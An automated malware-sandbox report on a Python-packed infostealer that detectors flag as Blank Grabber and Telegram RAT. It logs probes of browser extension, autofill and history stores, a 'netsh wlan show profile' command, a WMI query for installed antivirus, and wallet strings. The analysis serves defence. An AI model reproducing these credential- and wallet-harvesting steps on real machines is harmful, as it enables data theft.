              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10FC590 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7B10FC590
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B1116950 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7B1116950
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F48CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,72_2_00007FF71D2F48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1329466434.00000162E122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1329466434.00000162E1229000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7600, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
